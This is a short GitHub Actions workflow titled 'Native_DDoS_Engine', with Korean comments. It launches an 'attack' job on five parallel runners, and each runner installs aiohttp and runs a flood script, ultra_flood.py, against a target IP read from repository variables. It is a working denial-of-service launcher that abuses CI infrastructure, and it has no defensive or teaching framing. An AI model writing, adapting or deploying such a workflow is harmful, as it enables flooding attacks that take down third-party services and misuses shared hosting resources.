name: Native_DDoS_Engine
on:
  workflow_dispatch: # 패널에서 버튼 누른 후 여기서 실행

jobs:
  attack:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        node: [1, 2, 3, 4, 5]
    steps:
      - uses: actions/checkout@v3
      - name: Install
        run: pip install aiohttp
      - name: Launch
        env:
          TARGET: ${{ vars.TARGET_IP }} # 깃허브 변수에서 즉시 가져옴
        run: |
          # 비동기 엔진(ultra_flood.py) 실행
          python3 ultra_flood.py
